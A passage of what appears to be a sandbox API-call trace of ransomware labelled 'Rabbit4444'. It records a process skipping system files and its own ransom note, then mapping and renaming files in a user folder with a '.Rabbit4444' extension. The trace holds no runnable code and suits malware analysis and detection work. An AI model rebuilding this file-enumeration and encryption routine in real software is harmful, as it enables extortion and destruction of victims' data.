0x1177e8 [0059.409] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0059.409] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x660, lpName=0x0) returned 0x298 [0059.410] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x660) returned 0x70000 [0059.411] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.411] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0059.411] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.411] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0059.411] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.411] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0059.411] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.411] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0059.411] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15072214363) returned 1 [0059.411] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0059.411] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0059.412] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.412] CloseHandle (hObject=0x298) returned 1 [0059.412] CloseHandle (hObject=0x278) returned 1 [0059.412] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{bb64f8a7-bee7-4e1a-ab8d-7d8273f7fdb6}.settingcontent-ms.Rabbit4444") returned 192 [0059.412] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{bb64f8a7-bee7-4e1a-ab8d-7d8273f7fdb6}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{bb64f8a7-bee7-4e1a-ab8d-7d8273f7fdb6}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{bb64f8a7-bee7-4e1a-ab8d-7d8273f7fdb6}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{bb64f8a7-bee7-4e1a-ab8d-7d8273f7fdb6}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.412] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x556b8159, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x556b8159, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23052c93, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{BD256B65-94BE-4194-84BF-41D50D0EF26E}.settingcontent-ms", cAlternateFileName="CLE1F4~1.SET")) returned 1 [0059.412] lstrcmpiW (lpString1="Classic_{BD256B65-94BE-4194-84BF-41D50D0EF26E}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.412] lstrcmpiW (lpString1="Classic_{BD256B65-94BE-4194-84BF-41D50D0EF26E}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.413] lstrcmpiW (lpString1="Classic_{BD256B65-94BE-4194-84BF-41D50D0EF26E}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.413] lstrcmpiW (lpString1="Classic_{BD256B65-94BE-4194-84BF-41D50D0EF26E}.settingcontent-ms", lpString2=".") returned 1 [0059.413] lstrcmpiW (lpString1="Classic_{BD256B65-94BE-4194-84BF-41D50D0EF26E}.settingcontent-ms", lpString2="..") returned 1 [0059.413] lstrcmpiW (lpString1="Classic_{BD256B65-94BE-4194-84BF-41D50D0EF26E}.settingcontent-ms", lpString2="windows") returned -1 [0059.413] lstrcmpiW (lpString1="Classic_{BD256B65-94BE-4194-84BF-41D50D0EF26E}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.413] lstrcmpiW (lpString1="Classic_{BD256B65-94BE-4194-84BF-41D50D0EF26E}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.413] lstrcmpiW (lpString1="Classic_{BD256B65-94BE-4194-84BF-41D50D0EF26E}.settingcontent-ms", lpString2="boot") returned 1 [0059.413] lstrcmpiW (lpString1="Classic_{BD256B65-94BE-4194-84BF-41D50D0EF26E}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.413] lstrcmpiW (lpString1="Classic_{BD256B65-94BE-4194-84BF-41D50D0EF26E}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.413] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{BD256B65-94BE-4194-84BF-41D50D0EF26E}.settingcontent-ms" | out: lpString1="Classic_{BD256B65-94BE-4194-84BF-41D50D0EF26E}.settingcontent-ms") returned="Classic_{BD256B65-94BE-4194-84BF-41D50D0EF26E}.settingcontent-ms" [0059.413] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{BD256B65-94BE-4194-84BF-41D50D0EF26E}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.413] lstrlenW (lpString="Classic_{BD256B65-94BE-4194-84BF-41D50D0EF26E}.settingcontent-ms") returned 64 [0059.413] lstrlenW (lpString="Rabbit4444") returned 10 [0059.413] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.413] lstrlenW (lpString=".dll") returned 4 [0059.413] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.413] lstrlenW (lpString=".lnk") returned 4 [0059.413] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.413] lstrlenW (lpString=".ini") returned 4 [0059.413] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.413] lstrlenW (lpString=".sys") returned 4 [0059.413] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.413] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{BD256B65-94BE-4194-84BF-41D50D0EF26E}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{bd256b65-94be-4194-84bf-41d50d0ef26e}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.414] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.414] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15072457958) returned 1 [0059.414] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=980) returned 1 [0059.414] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0059.414] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0059.414] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6e0, lpName=0x0) returned 0x298 [0059.420] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6e0) returned 0x70000 [0059.421] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.421] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0059.421] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.421] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0059.421] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.421] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0059.421] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.421] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0059.421] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15073204553) returned 1 [0059.421] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0059.421] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0059.421] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.421] CloseHandle (hObject=0x298) returned 1 [0059.422] CloseHandle (hObject=0x278) returned 1 [0059.422] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{BD256B65-94BE-4194-84BF-41D50D0EF26E}.settingcontent-ms.Rabbit4444") returned 192 [0059.422] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{BD256B65-94BE-4194-84BF-41D50D0EF26E}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{bd256b65-94be-4194-84bf-41d50d0ef26e}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{BD256B65-94BE-4194-84BF-41D50D0EF26E}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{bd256b65-94be-4194-84bf-41d50d0ef26e}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.422] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55750ac5, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x55750ac5, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x232b5237, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x327, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{bd84b380-8ca2-1069-ab1d-08000948f534}.settingcontent-ms", cAlternateFileName="CL9CB7~1.SET")) returned 1 [0059.422] lstrcmpiW (lpString1="Classic_{bd84b380-8ca2-1069-ab1d-08000948f534}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.422] lstrcmpiW (lpString1="Classic_{bd84b380-8ca2-1069-ab1d-08000948f534}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.422] lstrcmpiW (lpString1="Classic_{bd84b380-8ca2-1069-ab1d-08000948f534}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.422] lstrcmpiW (lpString1="Classic_{bd84b380-8ca2-1069-ab1d-08000948f534}.settingcontent-ms", lpString2=".") returned 1 [0059.423] lstrcmpiW (lpString1="Classic_{bd84b380-8ca2-1069-ab1d-08000948f534}.settingcontent-ms", lpString2="..") returned 1 [0059.423] lstrcmpiW (lpString1="Classic_{bd84b380-8ca2-1069-ab1d-08000948f534}.settingcontent-ms", lpString2="windows") returned -1 [0059.423] lstrcmpiW (lpString1="Classic_{bd84b380-8ca2-1069-ab1d-08000948f534}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.423] lstrcmpiW (lpString1="Classic_{bd84b380-8ca2-1069-ab1d-08000948f534}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.423] lstrcmpiW (lpString1="Classic_{bd84b380-8ca2-1069-ab1d-08000948f534}.settingcontent-ms", lpString2="boot") returned 1 [0059.423] lstrcmpiW (lpString1="Classic_{bd84b380-8ca2-1069-ab1d-08000948f534}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.423] lstrcmpiW (lpString1="Classic_{bd84b380-8ca2-1069-ab1d-08000948f534}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.423] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{bd84b380-8ca2-1069-ab1d-08000948f534}.settingcontent-ms" | out: lpString1="Classic_{bd84b380-8ca2-1069-ab1d-08000948f534}.settingcontent-ms") returned="Classic_{bd84b380-8ca2-1069-ab1d-08000948f534}.settingcontent-ms" [0059.423] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{bd84b380-8ca2-1069-ab1d-08000948f534}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.423] lstrlenW (lpString="Classic_{bd84b380-8ca2-1069-ab1d-08000948f534}.settingcontent-ms") returned 64 [0059.423] lstrlenW (lpString="Rabbit4444") returned 10 [0059.423] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.423] lstrlenW (lpString=".dll") returned 4 [0059.423] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.423] lstrlenW (lpString=".lnk") returned 4 [0059.423] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.423] lstrlenW (lpString=".ini") returned 4 [0059.424] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.424] lstrlenW (lpString=".sys") returned 4 [0059.424] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.424] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{bd84b380-8ca2-1069-ab1d-08000948f534}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{bd84b380-8ca2-1069-ab1d-08000948f534}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.424] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.424] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15073471432) returned 1 [0059.424] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=807) returned 1 [0059.424] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0059.424] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1020c8 [0059.424] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x630, lpName=0x0) returned 0x298 [0059.425] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x630) returned 0x70000 [0059.426] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.426] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0059.426] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.426] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0059.426] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.426] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0059.426] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.426] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0059.426] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15073726381) returned 1 [0059.427] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0059.427] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1020c8 | out: hHeap=0xe0000) returned 1 [0059.427] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.427] CloseHandle (hObject=0x298) returned 1 [0059.427] CloseHandle (hObject=0x278) returned 1 [0059.427] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{bd84b380-8ca2-1069-ab1d-08000948f534}.settingcontent-ms.Rabbit4444") returned 192 [0059.427] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{bd84b380-8ca2-1069-ab1d-08000948f534}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{bd84b380-8ca2-1069-ab1d-08000948f534}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{bd84b380-8ca2-1069-ab1d-08000948f534}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{bd84b380-8ca2-1069-ab1d-08000948f534}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.428] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x557e9430, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x557e9430, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2211fcec, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x426, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{be122a0e-4503-11da-8bde-f66bad1e3f3a}.settingcontent-ms", cAlternateFileName="CL0DFF~1.SET")) returned 1 [0059.428] lstrcmpiW (lpString1="Classic_{be122a0e-4503-11da-8bde-f66bad1e3f3a}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.428] lstrcmpiW (lpString1="Classic_{be122a0e-4503-11da-8bde-f66bad1e3f3a}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.428] lstrcmpiW (lpString1="Classic_{be122a0e-4503-11da-8bde-f66bad1e3f3a}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.428] lstrcmpiW (lpString1="Classic_{be122a0e-4503-11da-8bde-f66bad1e3f3a}.settingcontent-ms", lpString2=".") returned 1 [0059.428] lstrcmpiW (lpString1="Classic_{be122a0e-4503-11da-8bde-f66bad1e3f3a}.settingcontent-ms", lpString2="..") returned 1 [0059.428] lstrcmpiW (lpString1="Classic_{be122a0e-4503-11da-8bde-f66bad1e3f3a}.settingcontent-ms", lpString2="windows") returned -1 [0059.428] lstrcmpiW (lpString1="Classic_{be122a0e-4503-11da-8bde-f66bad1e3f3a}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.428] lstrcmpiW (lpString1="Classic_{be122a0e-4503-11da-8bde-f66bad1e3f3a}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.428] lstrcmpiW (lpString1="Classic_{be122a0e-4503-11da-8bde-f66bad1e3f3a}.settingcontent-ms", lpString2="boot") returned 1 [0059.428] lstrcmpiW (lpString1="Classic_{be122a0e-4503-11da-8bde-f66bad1e3f3a}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.428] lstrcmpiW (lpString1="Classic_{be122a0e-4503-11da-8bde-f66bad1e3f3a}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.428] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{be122a0e-4503-11da-8bde-f66bad1e3f3a}.settingcontent-ms" | out: lpString1="Classic_{be122a0e-4503-11da-8bde-f66bad1e3f3a}.settingcontent-ms") returned="Classic_{be122a0e-4503-11da-8bde-f66bad1e3f3a}.settingcontent-ms" [0059.428] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{be122a0e-4503-11da-8bde-f66bad1e3f3a}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.428] lstrlenW (lpString="Classic_{be122a0e-4503-11da-8bde-f66bad1e3f3a}.settingcontent-ms") returned 64 [0059.428] lstrlenW (lpString="Rabbit4444") returned 10 [0059.428] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.428] lstrlenW (lpString=".dll") returned 4 [0059.428] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.428] lstrlenW (lpString=".lnk") returned 4 [0059.428] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.428] lstrlenW (lpString=".ini") returned 4 [0059.428] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.428] lstrlenW (lpString=".sys") returned 4 [0059.429] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.429] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{be122a0e-4503-11da-8bde-f66bad1e3f3a}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{be122a0e-4503-11da-8bde-f66bad1e3f3a}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.429] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.429] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15073964068) returned 1 [0059.429] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1062) returned 1 [0059.429] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0059.429] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0059.429] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x730, lpName=0x0) returned 0x298 [0059.430] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x730) returned 0x70000 [0059.431] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.431] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0059.431] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.431] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0059.431] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.431] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0059.431] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.431] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0059.431] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15074214822) returned 1 [0059.431] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0059.431] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0059.432] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.432] CloseHandle (hObject=0x298) returned 1 [0059.432] CloseHandle (hObject=0x278) returned 1 [0059.432] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{be122a0e-4503-11da-8bde-f66bad1e3f3a}.settingcontent-ms.Rabbit4444") returned 192 [0059.432] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{be122a0e-4503-11da-8bde-f66bad1e3f3a}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{be122a0e-4503-11da-8bde-f66bad1e3f3a}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{be122a0e-4503-11da-8bde-f66bad1e3f3a}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{be122a0e-4503-11da-8bde-f66bad1e3f3a}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.433] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55881d9c, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x55881d9c, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2211fcec, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3aa, dwReserved0=0xa0000003, dwReserved1=0x0, 